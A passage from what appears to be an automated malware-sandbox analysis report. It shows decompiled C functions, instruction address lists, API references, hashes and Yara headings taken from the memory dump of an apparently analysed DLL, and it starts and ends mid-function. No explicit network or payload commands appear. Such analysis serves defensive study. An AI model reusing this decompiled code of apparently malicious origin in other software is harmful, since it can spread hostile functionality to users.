				} while (_t36 != 0);
				_t37 =  *0x1001e684; // 0x2e1faa0
				 *((intOrPtr*)(_t37 + 0x78))(_t61);
				goto L18;
			}

0x1000aeb4
0x1000aec0
0x1000aec2
0x1000aec4
0x1000aeca
0x1000aecf
0x1000aed2
0x1000aed7
0x1000b011
0x1000b011
0x1000aeeb
0x1000aef0
0x1000b000
0x00000000
0x1000b00c
0x1000aef8
0x1000aef9
0x1000af00
0x1000af2f
0x1000af82
0x1000af82
0x1000af8a
0x1000af8b
0x1000af96
0x1000af98
0x1000af9b
0x1000afa0
0x1000afa2
0x1000afaa
0x1000afb0
0x1000afb2
0x1000afb4
0x1000afc9
0x1000afce
0x1000afd7
0x1000afdd
0x00000000
0x1000afa0
0x1000af31
0x1000af33
0x1000af33
0x1000af33
0x1000af3f
0x1000af40
0x1000af4a
0x00000000
0x00000000
0x1000af57
0x1000af5c
0x1000af61
0x00000000
0x00000000
0x1000af63
0x1000af6a
0x1000af70
0x1000af70
0x1000af73
0x1000af80
0x00000000
0x00000000
0x00000000
0x1000af80
0x1000afde
0x1000afe6
0x1000aff0
0x1000aff0
0x1000aff7
0x1000affd
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65

Uniqueness

Uniqueness Score: -1.00%

Function 1000980C, Relevance: 3.0, APIs: 2, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790

Uniqueness

Uniqueness Score: -1.00%

Function 10016EB0, Relevance: .4, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x5dc03300
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x55c35dc0
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0xfffffe8b
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x4e9
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x33000000
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0xfffffe8b
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x8b3c7e8c
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0xfffffe8b
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x238830a
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x830a74c0
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0xfffffe8b
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0x5d0674c0
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x4e95d06
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0xfffffe8b
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x8b3c7e8b
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x238830a
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0xfffffe8b
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}

0x10016eb3
0x10016eba
0x10016ebe
0x10016ec0
0x10016ec2
0x10016ec8
0x100173b5
0x100173bb
0x10016ece
0x10016eda
0x10016ee7
0x10016eea
0x10016ef1
0x10016ef4
0x10016ef7
0x10016efa
0x10016efb
0x10016efe
0x10016f04
0x10016f07
0x10016f0c
0x10016f1c
0x10016f1e
0x10016fd4
0x10017163
0x10017163
0x1001716c
0x1001727f
0x1001727f
0x10017286
0x10017286
0x1001728f
0x1001729c
0x100172a5
0x100172a8
0x100172ad
0x100172f5
0x100172af
0x100172af
0x100172b2
0x100172b9
0x100172bf
0x100172c2
0x100172c5
0x100172c8
0x100172cb
0x100172ce
0x100172d4
0x100172e2
0x100172e5
0x100172e8
0x100172f1
0x100172f1
0x100172f8
0x100172fb
0x10017301
0x10017308
0x1001730e
0x1001735c
0x10017368
0x1001736f
0x10017310
0x10017310
0x10017313
0x1001731c
0x1001731f
0x10017322
0x10017329
0x1001732c
0x1001732f
0x10017332
0x10017335
0x1001733b
0x10017346
0x1001734c
0x10017353
0x10017353
0x00000000
0x1001730e
0x10017172
0x10017172
0x10017179
0x10017179
0x10017182
0x1001718f
0x10017198
0x1001719b
0x100171a0
0x100171a2
0x100171a5
0x100171ac
0x100171b2
0x100171b5
0x100171b8
0x100171bb
0x100171be
0x100171c1
0x100171c7
0x100171d5
0x100171db
0x100171de
0x100171e1
0x100171e1
0x100171e4
0x100171e6
0x100171e9
0x100171ef
0x100171f6
0x100171fc
0x10017255
0x10017255
0x10017258
0x10017258
0x1001725e
0x10017266
0x10017273
0x100171fe
0x100171fe
0x10017209
0x1001720c
0x1001720f
0x10017212
0x10017219
0x1001721c
0x1001721f
0x10017222
0x10017225
0x1001722b
0x10017237
0x1001723c
0x10017249
0x10017249
0x00000000
0x100171fc
0x10016fda
0x10016fdf
0x10016fe5
0x10016fe5
0x10016fed
0x10016fed
0x10016ff5
0x10016ff5
0x10016ffd
0x1001700a
0x10017013
0x10017018
0x1001705d
0x1001705f
0x1001701a
0x1001701a
0x1001701d
0x10017020
0x10017027
0x1001702a
0x1001702d
0x10017030
0x10017033
0x10017039
0x10017047
0x1001704d
0x10017056
0x10017059
0x10017059
0x10017062
0x10017065
0x1001706b
0x1001706b
0x10017072
0x10017072
0x10017079
0x10017079
0x10017081
0x10017081
0x10017088
0x10017095
0x1001709e
0x100170a1
0x100170a6
0x100170a8
0x100170ab
0x100170b2
0x100170b8
0x100170bb
0x100170be
0x100170c1
0x100170c4
0x100170c7
0x100170cd
0x100170db
0x100170e1
0x100170e4
0x100170e7
0x100170e7
0x100170ea
0x100170ec
0x100170ef
0x100170f5
0x100170fc
0x10017102
0x1001715b
0x1001715b
0x00000000
0x10017104
0x10017104
0x1001710f
0x10017112
0x10017115
0x10017118
0x1001711f
0x10017122
0x10017125
0x10017128
0x1001712b
0x10017131
0x1001713d
0x10017142
0x1001714f
0x00000000
0x1001714f
0x10016f24
0x10016f2a
0x10016f2d
0x10016f30
0x10016f30
0x10016f33
0x10016f33
0x10016f39
0x10016f39
0x10016f41
0x10016f46
0x10016f53
0x10016f5c
0x10016f5f
0x10016f64
0x10016fac
0x10016f66
0x10016f66
0x10016f69
0x10016f70
0x10016f76
0x10016f79
0x10016f7c
0x10016f7f
0x10016f82
0x10016f85
0x10016f8b
0x10016f99
0x10016f9c
0x10016f9f
0x10016fa8
0x10016fa8
0x10016fb2
0x10016fb8
0x10016fbb
0x10016fc2
0x10016fc2
0x10017375
0x10017375
0x10017378
0x1001737a
0x1001737f
0x1001738e
0x1001739a
0x1001739f
0x1001739f
0x10017390
0x10017390
0x10017395
0x10017395
0x10017395
0x10017381
0x10017381
0x10017386
0x10017386
0x10017386
0x00000000
0x1001737f
0x10016f1e
0x10016f13
0x10016f16
0x100173a4
0x00000000
0x100173a4
0x00000000
0x100173a7
0x100173a7
0x100173ab
0x100173ab
0x100173ab
0x00000000
0x10016ef4

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction ID: 0c3308942ac57208bd8606007510a2814f56dadb0132f9c471c079d8b51e24d2
Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction Fuzzy Hash: EEF16D755092518FC709CF18C4D48FA7BF1FFA9310B1A82F9D8999B3A6D731A980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10014FC0, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
Instruction ID: e10ac18f6a2dc82c047ac3a6231bc634579b0427d93bb8cac9548a9b95137502
Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
Instruction Fuzzy Hash: 817135356201758FE704CF2ADCD05BA33A1E78E34138AC629FA46CF395C535E626CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10011758, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
Instruction ID: 8b2308eb0caa98c5fc40748196c6a291e313b8726404b2d010a505a218b38381
Opcode Fuzzy Hash: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
Instruction Fuzzy Hash: 175157B3B041B00BDF588E3D8C642757ED35AC515270EC2BAF9A9CB24AE978C7059760

Uniqueness

Uniqueness Score: -1.00%

Function 10012346, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
Instruction ID: 1f3934e2420efc180bb9c0cbc4fac13afaf5f650056083a87c6d8f741bd90931
Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
Instruction Fuzzy Hash: 6E2192766150128BD35CDF2CD8A2A69F3A5FB48310F45427ED42BCB682CB71E492CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
